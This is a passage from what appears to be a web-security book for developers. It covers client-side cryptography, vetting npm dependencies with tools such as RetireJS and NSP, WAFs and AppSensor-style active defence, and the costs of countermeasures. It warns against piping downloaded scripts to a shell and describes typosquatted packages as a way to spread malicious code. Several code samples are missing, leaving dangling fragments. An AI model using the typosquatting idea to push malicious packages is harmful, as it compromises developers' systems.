Cryptography on the client does have its place. Use it in its designated place and in accordance with the standard. We know the server should never trust the client, but if the application is entirely on the client with no server needing to afford trust to the client, and the client doesn’t want to trust the server, then it may be an option worth considering. If you consider how it may be abused at every point along the way, options do start to drop off quickly though. The following are some options that may suite the Web Crypto API:
Is one use case. In this scenario, the server doesn’t need to trust the client. It receives data from the client, stores it and returns it. The user is exchanging their data with themselves in the future. So long as the server never attempts to parse or execute it and the only browser that it may end up in is from the client that sent it to start with. The client is responsible for the key. The data is usually encrypted on the client, sent to the server encrypted, then fetched back to the client and then finally decrypted again with the key that the client is responsible for.
which uses a similar concept as the cloud storage, but the data doesn’t necessarily have to ever touch the server. A couple of offerings that come to mind are:
Basically client centric applications.
My preference is still to prefer any crypto to be performed on the server where you have more control, less attack surface and greater visibility.
Dibbe Edwards discusses some excellent initiatives on how they do it at IBM. I will attempt to paraphrase some of them here:
There is an excellent paper by the SANS Institute on Security Concerns in Using Open Source Software for Enterprise Requirements that is well worth a read. It confirms what the likes of IBM are doing in regards to their consumption of free and open source libraries.
As a developer, you are responsible for what you install and consume. Malicious NodeJS packages do end up on NPM from time to time. The same goes for any source or binary you download and run. The following commands are often encountered as being “the way” to install things:
Below is the official way to install NodeJS. Do not do this.
curl first, then make sure what you have just downloaded is not malicious.
Please do not
curl or fetch in any way and pipe what you think is an installer or any script to your shell without first verifying that what you are about to run is not malicious. Do not download and run in the same command.
The better option is to:
As part of an
npm install, package creators, maintainers (or even a malicious entity intercepting and modifying your request on the wire) can define scripts to be run on specific NPM hooks. You can check to see if any package has hooks (before installation) that will run scripts by issuing the following command:
npm show [module-you-want-to-install] scripts
npm show [module-you-want-to-install] scripts
The most important step here is downloading and inspecting before you run.
Similarly to Doppelganger Domains, People often miss-type what they want to install. If you were someone that wanted to do something malicious like have consumers of your package destroy or modify their systems, send sensitive information to you, or any number of other malicious activities (ideally identified in the Identify Risks section. If not already, add), doppelganger packages are an excellent avenue for raising the likelihood that someone will install your malicious package by miss typing the name of it with the name of another package that has a very similar name. I covered this in my “0wn1ng The Web” presentation, with demos.
Make sure you are typing the correct package name. Copy -> Pasting works.
Reviewing and deciding as an organisation which packages you allow your developers to consume is another good safety measure. Yes it means someone has to do the reviewing, but partly relying on the vetting that the tooling and other options discussed in this section can make this process quicker. Then via the Enterprise admin console, set
Read through cache to
Off so that only whitelisted packages can be fetched.
Whitelisted packages are those that are added to the Enterprise instance with:
npme add-package <packagename>
Simply checking the NPM registry to see if any of your installed or specific packages are currently out of date.
Running the following command in your application directory:
May produce output like the following:
Wantedis the maximum version of the package that satisfies the semver range specified in
latestis the version of the package tagged as latest in the registry.
Is a similar tool to npm-outdated, but provides more information and an API useful for using in a CI tool-chain. npm-check can also inform you of missing or packages that are not currently being used.
package.json file in your NodeJS project to check whether your dependencies are up to date and no known vulnerabilities are found. You embed a badge on your Github page giving immediate feedback, which links to a page with details of any issues for your dependencies.
RetireJS has the following:
npm i -g retire
precommit-hook, which installs the git
pre-commithook into the usual
.git/hooks/pre-commitfile of your projects repository. This will allow us to run any scripts immediately before a commit is issued.
package.json. This will make sure that when other team members fetch your code, the same
retirescript will be run on their
If you do not configure the hook via the
package.json to run specific scripts, it will run
test by default. See the RetireJS documentation for options.
pre-commit property allows you to specify which scripts you want run before a successful commit is performed. The following
package.json defines that the
validate scripts will be run.
validate runs our
Keep in mind that
pre-commit hooks can be very useful for all sorts of checking of things immediately before your code is committed. For example running security regression tests mentioned previously in Fascicle 0 with the OWASP ZAP API, as demonstrated here: https://youtu.be/DrwXUOJWMoo.
provides “intentful auditing as a stream of intel for bithound”. Last time I spoke with Adam Baldwin this project was moving slowly. From all the redirects going on, it appears to be now soaked up into Node Security Platform (NSP).
According to the Bithound Github, there doesn’t appear to be much activity on this project currently, which may make sense as requireSafe appears to have been moved to NSP.
In regards to NPM packages, we know the following things:
bithound can be configured to not analyse some files. Very large repositories are prevented from being analysed due to large scale performance issues.
Analyses both NPM and Bower dependencies and notifies you if any are:
Analysis of opensource projects are free.
NSP at the time of writing is quite popular. It provides Github pull request integration, Has a Code Climate Node Security Engine. Code Climate was discussed briefly in the “Linting, Static Analysis” section of “Code Review” in the Process and Practises chapter of Fascicle 0. Also has a CLI, so is CI friendly.
You can install the NSP CLI like:
npm install -g nsp
To find out what nsp gives you:
To run a check, cd into your application directory and:
Any known vulnerabilities present will be printed.
There is also a:
gulp-nsp) which you can use to check all dependencies listed in your
Ctrl+Shift+Cand run the following command:
ext install vscode-nsp
Has a fairly similar feature set to NSP, plus more, like:
The pricing model seems a little dearer for non open source projects than NSP.
You could of course just list all of your projects and global packages and check that there are none in the advisories, but this would be more work and who is going to remember to do that all the time?
For .Net developers, there is the likes of OWASP SafeNuGet.
OWASP DependencyCheck also notifies of known, publicly disclosed vulnerabilities in Java and .Net, with experimental support for Ruby, Node.js and Python. I haven’t used DependencyCheck, it produces false positives and false negatives.
WAFs are similar to Intrusion Prevention Systems (IPS) except they operate at the Application Layer(HTTP), Layer 7 of the OSI model. So they understand the concerns of your web application at a technical level. WAFs protect your application against a large number of attacks, like XSS, CSRF, SQLi, Local File Inclusion (LFI), session hijacking, invalid requests (requests to things that do not exist (think 404)). WAFs sit in-line between a gateway and the web application. They run as a proxy. Either on the physical web server or on another network node, but only the traffic directed to the web application is inspected, where as an IDS/IPS inspects all network traffic passed through its interfaces. WAFs use signatures that look like specific vulnerabilities to compare the network traffic targeting the web application and apply the associated rule(s) when matches are detected. Although not only limited to dealing with known signatures, some WAFs can detect and prevent attacks they have not seen before like responses containing larger than specified payloads. The source code of the web application does not have to be modified.
You can think of this as taking a WAF one step closer to your application. In fact integrating it with your application. Augmenting your application with logic to detect and respond to threats.
AppSensor brings detection -> prevention to your domain level. Most applications today just take attacks & fall over. I have heard so many times we want our applications to fail securely when they get bad input. We do not want our applications being bullied and failing securely. We want them to not fail at all in production, but rather defend themselves.
Technically AppSensor is not a WAF because the concepts are used to shape your application logic.
The project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into your applications. Providing attack awareness baked in, with real-time defences.
AppSensor provides > 50 (signature based) detection points. Provides guidance on how to respond once an attack is identified. Possible actions include:
At the time of writing the sample code is only in Java. The documentation is well worth checking out though. Resources in Additional Resources chapter.
The application should recognise unusual requests. Automated scanning should be distinguishable from normal traffic.
By creating custom behaviour that responds to specific out of the ordinary requests with misleading feedback and/or behaviour that builds the attackers confidence and ultimately wastes their time, you as the application administrator can have the upper hand when it comes to actively defending against your attackers.
By spending the attackers budget for them, you are ultimately depleting their resources, which will cause them to make silly mistakes and be caught and/or just run out of time.
Often with increased security comes increased confidence. Increased confidence is a weakness in itself, along with the fact that it brings with it other vulnerabilities. The more you know, the more you should be aware of how vulnerable you are.
With the added visibility, you will have to make decisions based on the new found information you now have. There will be no more blissful ignorance if there was before.
There will be learning and work to be done to become familiar with libraries and tooling. Code will have to be written around logging as in wrapping libraries, initialising and adding logging statements or hiding them using AOP.
Instrumentation will have to be placed in your code. Again another excellent candidate for AOP.
You may have to invest considerable time yourself to gain good understanding into what can go wrong, where, how and how to mitigate it happening. Be inquisitive and experiment.
There will be more code in your systems. More code is more code that can have faults.
Be very careful with sanitisation. Try first to use well tested and battle hardened libraries. Resist going out on your own to modify or create sanitisation routines. They are very easy to miss edge cases and small spots that your untrusted data may end up in that you did not anticipate, thus leaving you susceptible to attack.
As with all code review, it can be costly, you need to weigh the cost of review with the cost of you and your customers being exploited, I.E. loosing the assets we have discussed.
Avoiding the use of external interpreters means you will have to do the interpreting yourself, or you will have to be more thorough in performing the other countermeasures.
Occasionally finding a parametrised API for your use case can be a challenge.
Going through the process of defining your semantic types can take some time and it often causes the stake holders to think about things they may have glossed over. Working through validation, filtering and sanitisation can be time consuming.
Making sure you embrace least privilege will probably take you some time, again, this cost needs to be weighed up.
Making sure that the system is not revealing unnecessary information that could aid an attacker in their understanding of your systems internals will mean some testing and probably code review will be necessary. This will take time.
If you have a legacy system with SQLi issues, then you will need to invest the time to fix them,
One risk that I see happening here all to often, is developers not understanding the particular NoSQL data store they are using, as I have mentioned, the 225 + data stores all like to do things differently, you will need to understand their APIs, what they do well and do not do well. Read the documentation, if the documentation is poor, consider using something else, if that is out of the question, dive into the implementation and work out what you need to do from that
Reviewing code, testing and making the changes costs money.
May just be time here to work out what you are currently doing wrong and what you can do better.
Time to review, test and apply countermeasures.
Time to review, test and apply countermeasures.
Time to review, test and apply countermeasures.
Time to review, test and apply countermeasures.
Bots may/will get smarter and start reading and thinking for themselves. It is probably worth not crossing that bridge until it arrives. This will not stop humans spamming, but neither will any other captcha, unless they also stop genuine users, which according to the studies mentioned in the countermeasures section happens very often.
If you decide to go with one of the captcha options, there is the risk of:
Reliance on adjacent layers of defence means those layers have to actually be up to scratch. There is a possibility that they will not be.
Possibility of missing secrets being sent over the wire.
Possible reliance on obscurity with many of the strategies I have seen proposed. Just be aware that obscurity may slow an attacker down a little, but it will not stop them.
With moving any secrets from source code to configuration files, there is a possibility that the secrets will not be changed at the same time. If they are not changed, then you have not really helped much, as the secrets are still in source control.
With good configuration tools like node-config, you are provided with plenty of options of splitting up meta-data, creating overrides, storing different parts in different places, etc. There is a risk that you do not use the potential power and flexibility to your best advantage. Learn the ins and outs of what ever system it is you are using and leverage its features to do the best at obscuring your secrets and if possible securing them.
is an excellent configuration package with lots of great features. There is no security provided with node-config, just some potential obscurity. Just be aware of that, and as discussed previously, make sure surrounding layers have beefed up security.
As is often the case with Microsoft solutions, their marketing often leads people to believe that they have secure solutions to problems when that is not the case. As discussed previously, there are plenty of ways to get around the Microsoft so called security features. As anything else in this space, they may provide some obscurity, but do not depend on them being secure.
Statements like the following have the potential for producing over confidence:
“vSentry protects desktops without requiring patches or updates, defeating and automatically discarding all known and unknown malware, and eliminating the need for costly remediation.”
Please keep your systems patched and updated.
“With Bromium micro-virtualization, we now have an answer: A desktop that is utterly secure and a joy to use”
There is a risk that people will believe this.
As with Microsofts “virtualisation-based security” Linux containers may slow system compromise down, but a determined attacker will find other ways to get around container isolation. Maintaining a small set of user accounts is a worthwhile practise, but that alone will not be enough to stop a highly skilled and determined attacker moving forward.
Even when technical security is very good, an experienced attacker will use other mediums to gain what they want, like social engineering and physical as discussed in the People and Physical chapters of Fascicle 0, or some other attack vectors listed in this book. Defence in depth is crucial in achieving good security. Concentrating on the lowest hanging fruit first and working your way up the tree.
Locking file permissions and ownership down is good, but that alone will not save you.
Applying least privilege to everything can take quite a bit of work. Yes, it is probably not that hard to do, but does require a breadth of thought and time. Some of the areas discussed could be missed. Having more than one person working on the task is often effective as each person can bounce ideas off of each other and the other person is likely to notice areas that you may have missed and visa-versa.
Segmentation is useful, and a common technique to helping to build resistance against attacks. It does introduce some complexity though. With complexity comes the added likely-hood of introducing a fault.
If you follow the advice in the countermeasures section, you will be doing more than most other organisations in this area. It is not hard, but if implemented could increase complacency/over confidence. Always be on your guard. Always expect that although you have done a lot to increase your security stance, a determined and experienced attacker is going to push buttons you may have never realised you had. If they want something enough and have the resources and determination to get it, they probably will. This is where you need strategies in place to deal with post compromise. Create process (ideally partly automated) to deal with theft.
Also consider that once an attacker has made off with your data-store, even if it is currently infeasible to brute-force the secrets, there may be other ways around obtaining the missing pieces of information they need. Think about the paper shredders as discussed in the Physical chapter of Fascicle 0 and the associated competitions. With patience, most puzzles can be cracked. If the compromise is an opportunistic type of attack, they will most likely just give up and seek an easier target. If it is a targeted attack by determined and experienced attackers, they will probably try other attack vectors until they get what they want.
Do not let over confidence be your weakness. An attacker will search out the weak link. Do your best to remove weak links.
This is a complex topic with many areas that the developer must understand in order to make the best decisions. Having team members that already have strengths in these areas can help a lot. The technologies are moving fast, but many of the concepts encountered are similar across the technology generations. It helps to have a healthy fear, some experience of what can go wrong, and an understanding of just how many concepts must be understood in order to piece together a solution that is going to work well and resist the attacks of your enemies.
The flows, what they are, how they work and in which situations you should use any one of them, can easily be misunderstood.
When navigating the edge-cases and deciding on specific paths, the developer can often end up at a dead-end and must back-track/re-architect their approach.
There are risks that you may misinterpret any of the specifications, such as OAuth and OpenID, as these are complicated and fraught with concepts that can be easily misunderstood.
The Web Cryptography API specification provides algorithm recommendations, that are not necessarily optimal, such as the most commonly used 30 year old AES-CBC mode of operation that has known vulnerabilities, and caveats that you must know about in order to use securely, such as:
Some of the above content was used from https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation
Licensed under CC by 3.0
There is no normative guidance in the specification as to which primitives have better qualities than others. For example the symmetric block cipher AES-GCM is good, but all of the other symmetric block ciphers listed are not authenticated encryption modes. Thus they don’t provide assurance that the data has not been modified. With a specification that is lacking normative advice to browser vendors, it’s likely that the Web Crypto API will fail to serve the purpose it was created for, or at best provide the right primitives, but provide the dangerous ones also, and by looking at where chrome and firefox is heading, that looks to be the case.
The following table shows the Web Crypto API supported algorithms for Chromium (as of version 46) and Mozilla (as of July 2016).
At least both are offering AES-GCM, but now you have to make the decision, and to much choice can bring confusion. The only way for us web developers to know which choices to make, is spend the time researching what to use where and asking your self the questions, why? Question everything.
As usual, the OWASP guidance (Cryptographic Storage Cheat Sheet) is excellent.
There are many stack-overflow questions and answers where many think they have the answers but really don’t and even accepted answers are completely incorrect and miss leading. Learn who the experts are, find out what they have to say and test their answers against what other experts have to say and for your self. All the information is available, you do have to take the time to absorb it though. There are few short-cuts that will put you in a good place for working out the optimal solution for your project.
Adding process and tooling as discussed is a really good start, but it’s not a complete solution alone to take care of the consumption of free and open source packages.
Some of the packages we consume may have good test coverage, be up to date, and have no known vulnerabilities. Are the tests testing the right things though? Are the tests testing that something bad can “not” happen, as we discussed in the creation of “Evil Test Conditions” in the “Agile Development and Practices” section of the “Process and Practises” chapter in Fascicle 0? This is where we really need something extra on top of a good process, static analysis and dependency checking tools. This is really where you need to leverage the likes of security regression testing, as I discussed in the “Agile Development and Practices” section of the “Process and Practises” chapter in Fascicle 0.
There is a danger of implementing to much manual process thus slowing development down more than necessary. The way the process is implemented will have a lot to do with its level of success. For example automating as much as possible, so developers don’t have to think about as much as possible is going to make for more productive, focused and happier developers.
For example, when a Development Team needs to pull a library into their project, which often happens in the middle of working on a product backlog item, not necessarily planned at the beginning of the Sprint. If they have to context switch while a legal review and/or manual code review takes place, then this will cause friction and reduce the teams performance even though it may be out of their hands.
In this case, the Development Team really needs a dedicated resource to perform the legal review. The manual review could be done by another team member or even themselves with perhaps another team member having a quicker review after the fact. These sorts of decisions need to be made by the Development Team, not mandated by someone outside of the team that doesn’t have skin in the game or does not have the localised understanding that the people working on the project do.
Maintaining a list of the approved libraries really needs to be a process that does not take a lot of human interaction. How ever you work out your process, make sure it does not require a lot of extra developer effort on an ongoing basis. Some effort up front to automate as much as possible will facilitate this.
Relying on tooling alone is not enough.
Using the likes of pre-commit hooks with the CLIs and the other tooling options detailed in the Countermeasures section integrated with CI builds, and creating scripts to do most of the work for us, is going to be a good option to start with. Adding the automation of security regression testing on top of that, and your solution for managing potential vulnerabilities in free and open source packages is starting to look pretty solid.
Applying WAFs can act as a band-aid, masking the underlying issues with the application code. Ideally your security issues want to fail fast in development. If you are running the types of tests and doing the types of activities I discussed in Fascicle 0 in the Process and Practises chapter, you should have a fairly good handle on your defects. Most WAFs I have seen are pretty old-school, in that they do not actively attack the attackers.
Moving toward an active automated prevention standpoint where you have code that intentionally attracts and responds to attackers is usually far more effective at dealing with malicious actors.
All security has a cost. Your resources are limited, spend them wisely.
You can do a lot for little cost here. I would rather trade off a few days work in order to have really good logging and instrumentation systems through your code base that is going to show you errors fast in development and pretty much anything you want to measure. Then show the types of errors and statistics devops need to see in production.
Same goes for dark cockpit type monitoring. Find a tool that you find working with a pleasure. There are just about always free and open source tools to every commercial alternative. If you are working with a start-up or young business, the free and open source tools can be excellent to keep ongoing costs down. Especially mature tools that are also well maintained like the ones I’ve mentioned in the Countermeasures section.
If you can tighten up your validation and filtering, then less work will be required around sanitisation and that is where most of the effort (effort ≈ time) seems to go. This often reduces the end user experience though.
Once you fully understand the dangers you’ll be able to make these decisions easier.
As mentioned in the “Risks that Solution Causes”, I will generally favour storing session identifiers in localstorage and concentrating on Input Validation, Filtering and Sanitisation.
You have a responsibility to your organisation and your customers to keep them safe. When you have weighed the costs of reviewing your code and if it is honestly more expensive than the cost of you and your customers being exploited, I.E. loosing your assets, then and only then, should you neglect this.
Writing interpreters will more than likely be very costly, and in most cases this will not be necessary. Find one that takes the risks discussed seriously and provides the correct countermeasures as discussed, or make sure you take care of the validation, filtering and sanitisation properly yourself.
If you can not find a parametrised API for your use case, you will need to consider doing this your self, as in wrapping what ever the best is that is available and providing your own parametrisation.
Creating semantic types forces you and your stake holders to think about your business requirements, anything that makes us think about these are usually helpful in making sure we are building the right thing. There is not really any alternatives to actually thinking the semantic types, validation, filtering and sanitisation through and making sure you are doing it properly, this is crucial to catching malicious sequences of untrusted data. The only other alternative is to just not process untrusted data.
Making sure your accounts and everything that can execute untrusted data have only the privileges assigned to them to do what they must do and no more.
If you do try and cut costs here, then you are providing the information that your attacker requires to understand how your systems internals are structured. If you reveal the systems weaknesses, they will be exploited.
The only possible short-cut here is to not deal with untrusted data.
Similar to SQLi
Exactly how much it will cost you will depend on how poorly the code is written, and how much has to be refactored.
If you have had a look at how easily some of these defects are exploitable, then you may realise that the costs to remedy are small in comparison to loosing your assets.
Similar costs to that of Command Injection, just different technology.
Similar costs to that of what we have already covered, just different technology.
Similar costs to that of what we have already covered, just different technology.
Similar costs to that of what we have already covered, just different technology.
It does mean that any spam submitted by a real human will have to be moderated by a real human, although this usually takes less time than the human submitting the spam. For me, this is a trade-off worth taking to provide an optimal user experience for my customers/clients.
There is potential for hidden costs here, as adjacent layers will need to be hardened. There could be trade-offs here that force us to focus on the adjacent layers. This is never a bad thing though. It helps us to step back and take a holistic view of our security.
There should be little cost in moving secrets out of source code and into configuration files.
You will need to weigh up whether the effort to obfuscate secrets is worth it or not. It can also make the developers job more cumbersome. Some of the options provided may be worthwhile doing.
Containers have many other advantages and you may already be using them for making your deployment processes easier and less likely to have dependency issues. They also help with scaling and load balancing, so they have multiple benefits.
Is something you should be at least considering and probably doing in every case. It is one of those considerations that is worth while applying to most layers.
Segmenting of resources is a common and effective measure to take for at least slowing down attacks and a cost well worth considering if you have not already.
The countermeasures discussed here go without saying, although many organisations do not do them well if at all. It is up to you whether you want to be one of the statistics that has all of their secrets revealed. Following the countermeasures here is something that just needs to be done if you have any data that is sensitive in your data-store(s).
If you still struggle, reach out to me, and I’ll do my best to help.
I’ve covered many technologies in this chapter and also in others, such as in the Network chapter under Countermeasures:
That if adopted and practised properly, along with selecting the right low level primitives for the Web Crypto API, can help us achieve a level of security that will work for us (the web application developers/owners). Of course this puts our best interests at the forefront, but not necessarily the end users. As developers creating solutions for our users, We have a responsibility to put our users concerns first.
The process has to be streamlined so that it does not get in the developers way. A good way to do this is to ask the developers how it should be done. They know what will get in their way. In order for the process to be a success, the person(s) mandating it will need to get solid buy-in from the people using it (the developers).
The idea of setting up a process that notifies at least the Development Team if a library they want to use has known security defects, needs to be pitched to all stakeholders (developers, product owner, even external stakeholders) the right way. It needs to provide obvious benefit and not make anyones life harder than it already is. Everyone has their own agendas. Rather than fighting against them, include consideration for them in your pitch. I think this sort of a pitch is actually reasonably easy if you keep these factors in mind.
It will cost you some time to create these type of active defence modules. If you are lucky, by the time you read this, I may already have some. It is on my current todo list.